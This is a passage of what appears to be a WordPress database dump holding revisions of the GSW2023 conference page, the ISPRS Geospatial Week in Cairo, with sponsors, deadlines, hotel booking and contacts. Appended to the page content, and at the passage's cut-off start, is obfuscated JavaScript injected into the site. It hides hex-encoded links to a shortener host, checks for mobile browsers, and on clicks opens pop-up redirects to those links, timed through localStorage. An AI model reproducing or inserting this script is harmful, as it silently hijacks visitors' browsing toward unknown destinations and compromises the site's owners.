Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:32:26','2023-05-17 06:32:26','',3066,'https://gsw2023.com/?p=4544',0,'revision','',0),
(4545,1,'2023-05-17 06:33:04','2023-05-17 06:33:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305100989{margin-top: 50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 